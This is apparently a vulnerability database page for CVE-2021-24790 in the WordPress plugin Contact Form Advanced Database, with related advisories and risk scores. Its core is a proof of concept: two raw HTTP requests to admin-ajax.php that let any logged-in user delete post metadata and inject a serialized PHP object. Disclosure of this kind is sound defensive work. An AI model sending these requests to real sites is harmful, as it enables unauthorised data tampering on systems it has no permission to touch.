Lucene search
+L

Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls

🗓️ 15 Nov 2021 00:00:00Reported by Quentin VILLAIN (3wsec)Type 
wpexploit
 wpexploit
👁 158 Views

Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX calls to delete post metadata and demonstrate object injectio

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
attackerkb
CVE-2021-24790
13 Dec 202111:15
attackerkb
circl
Circl
CVE-2021-24790
13 Dec 202114:25
circl
cnnvd
CNNVD
WordPress 插件安全漏洞
13 Dec 202100:00
cnnvd
cnvd
CNVD
WordPress plugin Contact Form Advanced Database security bypass vulnerability
31 Dec 202100:00
cnvd
cve
CVE
CVE-2021-24790
13 Dec 202110:40
cve
cvelist
Cvelist
CVE-2021-24790 Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls
13 Dec 202110:40
cvelist
euvd
EUVD
EUVD-2021-11702
7 Oct 202500:30
euvd
nvd
NVD
CVE-2021-24790
13 Dec 202111:15
nvd
osv
OSV
CVE-2021-24790
13 Dec 202111:15
osv
patchstack
Patchstack
WordPress Contact Form Advanced Database plugin <= 1.0.8 - Unauthorized AJAX Calls vulnerability
15 Nov 202100:00
patchstack
Rows per page
To delete the _edit_lock metadata of the post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock


To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2021 17:42Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24
CVSS 3.14.3
EPSS0.0037
158